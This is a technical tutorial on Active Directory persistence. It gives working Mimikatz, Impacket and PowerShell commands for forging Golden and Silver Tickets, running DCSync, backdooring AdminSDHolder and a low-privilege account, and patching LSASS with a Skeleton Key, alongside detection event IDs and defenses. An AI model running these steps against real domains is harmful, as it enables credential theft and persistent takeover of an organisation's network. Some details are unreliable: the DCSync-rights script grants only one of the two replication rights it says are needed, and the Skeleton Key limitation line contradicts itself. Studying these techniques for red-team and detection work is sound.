Active Directory Persistence Techniques: A Technical Deep Dive
Once an attacker achieves Domain Admin privileges in an Active Directory environment, the next goal is persistence — maintaining access even after password resets, reboots, and incident response efforts. Understanding these techniques is essential for both red teamers (to demonstrate impact) and blue teamers (to detect and respond). This guide covers the most significant AD persistence mechanisms used in real-world attacks.
Legal notice: These techniques must only be studied and practiced in authorized lab environments (e.g., your own AD lab or platforms like HackTheBox, TryHackMe). Unauthorized use is a serious crime.
Prerequisites
Most AD persistence techniques require Domain Admin or Domain Controller access. Common tools used throughout this guide:
- Mimikatz — credential dumping and ticket manipulation
- Impacket (secretsdump, ticketer, wmiexec) — Python-based AD attack suite
- Rubeus — .NET Kerberos toolkit
1. Golden Ticket Attack
A Golden Ticket is a forged Kerberos Ticket Granting Ticket (TGT) signed with the NTLM hash of the krbtgt account. Because every TGT in a domain is signed by this key, a valid krbtgt hash lets you forge tickets for any user, including non-existent ones, with any group membership, for as long as the hash remains unchanged.
Why It’s Powerful
The krbtgt password is rarely rotated (it must be reset twice to fully invalidate old hashes). A Golden Ticket can be valid for 10 years by default.
Requirements
- Domain SID
krbtgt account NTLM hash
With Mimikatz on the DC:
mimikatz # lsadump::lsa /patch
mimikatz # lsadump::dcsync /user:krbtgt
With Impacket secretsdump:
impacket-secretsdump -just-dc-user krbtgt domain.local/administrator:'Password123!'@dc01.domain.local
Output includes:
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:HASH_HERE:::
Step 2: Get Domain SID
# PowerShell
(Get-ADDomain).DomainSID.Value
# Or: whoami /user (take everything before the last -XXXX)
Step 3: Forge the Golden Ticket
With Mimikatz:
mimikatz # kerberos::golden /user:Administrator /domain:domain.local \
/sid:S-1-5-21-XXXXXXXX-XXXXXXXX-XXXXXXXX \
/krbtgt:KRBTGT_HASH \
/ptt
/ptt (pass-the-ticket) injects it directly into the current session. Use /ticket:golden.kirbi to save it to disk instead.
With Impacket:
impacket-ticketer -nthash KRBTGT_HASH \
-domain-sid S-1-5-21-XXXXXXXX-XXXXXXXX-XXXXXXXX \
-domain domain.local \
Administrator
export KRB5CCNAME=Administrator.ccache
impacket-wmiexec -k -no-pass administrator@dc01.domain.local
Detection
- Event ID 4769 with unusual encryption type (0x17 = RC4 when AES is standard)
- Event ID 4672 for special privilege logon
- Tickets with lifetimes exceeding domain policy (>10 hours)
- Microsoft Defender for Identity alerts on Golden Ticket usage
2. Silver Ticket Attack
A Silver Ticket is a forged Kerberos Service Ticket (TGS) signed with the NTLM hash of a service account rather than krbtgt. Silver Tickets bypass the DC entirely during authentication — making them harder to detect.
Trade-offs vs Golden Ticket
| Aspect | Golden Ticket | Silver Ticket |
|---|
| Signed by | krbtgt | Service account |
| DC contact required | No (after initial) | No |
| Scope | All services in domain | Single service only |
| Detection difficulty | Moderate | High (no DC logs) |
Common Service Targets
| Service | SPN Prefix | Access Gained |
|---|
| CIFS | cifs/ | File shares |
| HOST | host/ | Remote management |
| HTTP | http/ | Web services |
| MSSQL | MSSQLSvc/ | SQL Server |
| LDAP | ldap/ | LDAP queries |
Step 1: Get Service Account Hash
# Dump computer account hash (for CIFS/HOST on the machine itself)
impacket-secretsdump -just-dc-ntlm domain.local/admin:'Password123!'@dc01.domain.local
Step 2: Forge the Silver Ticket
mimikatz # kerberos::golden /user:Administrator /domain:domain.local \
/sid:S-1-5-21-XXXXXXXX-XXXXXXXX-XXXXXXXX \
/target:fileserver01.domain.local \
/service:cifs \
/rc4:MACHINE_ACCOUNT_HASH \
/ptt
After injection, access the share directly: dir \\fileserver01\C$
3. DCSync Attack
DCSync mimics the behavior of a Domain Controller replication request to pull password hashes for any account from the DC — without running code on the DC itself.
Requirements
- Accounts with
DS-Replication-Get-Changes and DS-Replication-Get-Changes-All permissions
- This is granted by default to Domain Admins, Enterprise Admins, and domain controllers
With Mimikatz
mimikatz # lsadump::dcsync /domain:domain.local /user:krbtgt
mimikatz # lsadump::dcsync /domain:domain.local /all /csv
With Impacket
impacket-secretsdump -just-dc domain.local/administrator:'Password123!'@dc01.domain.local
The /all flag dumps every account’s hash — the complete domain credential store.
Granting DCSync Rights for Persistence
If you have DA access, grant DCSync rights to a low-privilege account so it persists after your DA session ends:
# PowerShell - add DCSync rights to a regular user
$acl = Get-Acl "AD:\DC=domain,DC=local"
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule `
([Security.Principal.NTAccount]"domain\lowprivuser"), `
"ExtendedRight", `
"Allow", `
([GUID]"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"), # DS-Replication-Get-Changes
"None", `
([GUID]"00000000-0000-0000-0000-000000000000")
$acl.AddAccessRule($ace)
Set-Acl -Path "AD:\DC=domain,DC=local" -AclObject $acl
Detection
- Event ID 4662 with access mask
0x100 on the domain object
- Microsoft Defender for Identity has dedicated DCSync detection
- Unusual replication traffic from non-DC hosts
4. AdminSDHolder Abuse
AdminSDHolder is a special AD container that defines the ACL template for protected groups (Domain Admins, Enterprise Admins, etc.). Every 60 minutes, the SDProp process copies AdminSDHolder’s ACL to all protected group members.
The Abuse
If you modify AdminSDHolder’s ACL to grant a low-privilege user Full Control, SDProp will propagate that permission to all Domain Admins — giving your backdoor account control over the most privileged users in the domain, indefinitely.
# Add Full Control on AdminSDHolder for a backdoor user
$backdoor = "domain\backdooruser"
$adminsdholder = [ADSI]"LDAP://CN=AdminSDHolder,CN=System,DC=domain,DC=local"
$rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
[Security.Principal.NTAccount]$backdoor,
[System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
[System.Security.AccessControl.AccessControlType]::Allow
)
$adminsdholder.ObjectSecurity.AddAccessRule($rule)
$adminsdholder.CommitChanges()
After the next SDProp cycle (up to 60 minutes, or trigger manually), backdooruser has Full Control over all domain admin accounts — allowing password resets and group membership changes.
Detection
- Monitor ACL changes on
CN=AdminSDHolder,CN=System
- Event ID 5136 (directory service object modification)
- Audit the AdminSDHolder ACL regularly with:
Get-Acl "AD:\CN=AdminSDHolder,CN=System,DC=domain,DC=local"
5. Skeleton Key Attack
A Skeleton Key patches the LSASS process on a Domain Controller to accept a universal password for all accounts without changing actual passwords — a true backdoor.
Deploying with Mimikatz
mimikatz # privilege::debug
mimikatz # misc::skeleton
After this, any account can authenticate with either their real password or the skeleton key password: mimikatz (default).
Limitations
- Does not survive a DC reboot (LSASS memory only)
- Detected by EDR solutions monitoring LSASS patching
- Does not work with Kerberos RC4/AES encryption — Kerberos authentication is unaffected; only NTLM-based auth uses the skeleton key
Detection
- Event ID 7045 (new service installed — Mimikatz uses a driver)
- LSASS process memory modification alerts (Windows Defender Credential Guard prevents this entirely)
- Behavioral analytics on unusual LSASS access patterns
Defense Summary
| Technique | Primary Detection | Prevention |
|---|
| Golden Ticket | MDI alerts, ticket anomalies | Rotate krbtgt twice, enable AES |
| Silver Ticket | Service usage anomalies | Monitor NTLM service auth |
| DCSync | Event 4662, MDI | Audit DS-Replication rights |
| AdminSDHolder | Event 5136, ACL audit | Monitor SDProp container |
| Skeleton Key | LSASS alerts | Credential Guard, EDR |
Summary
AD persistence techniques are sophisticated attacks that exploit fundamental Kerberos and AD design features. The Golden Ticket and DCSync are the most impactful because they are domain-wide in scope and can survive nearly any remediation that does not include a krbtgt double-reset. Building a home AD lab and practicing detection alongside exploitation is the most effective way to deeply understand these techniques.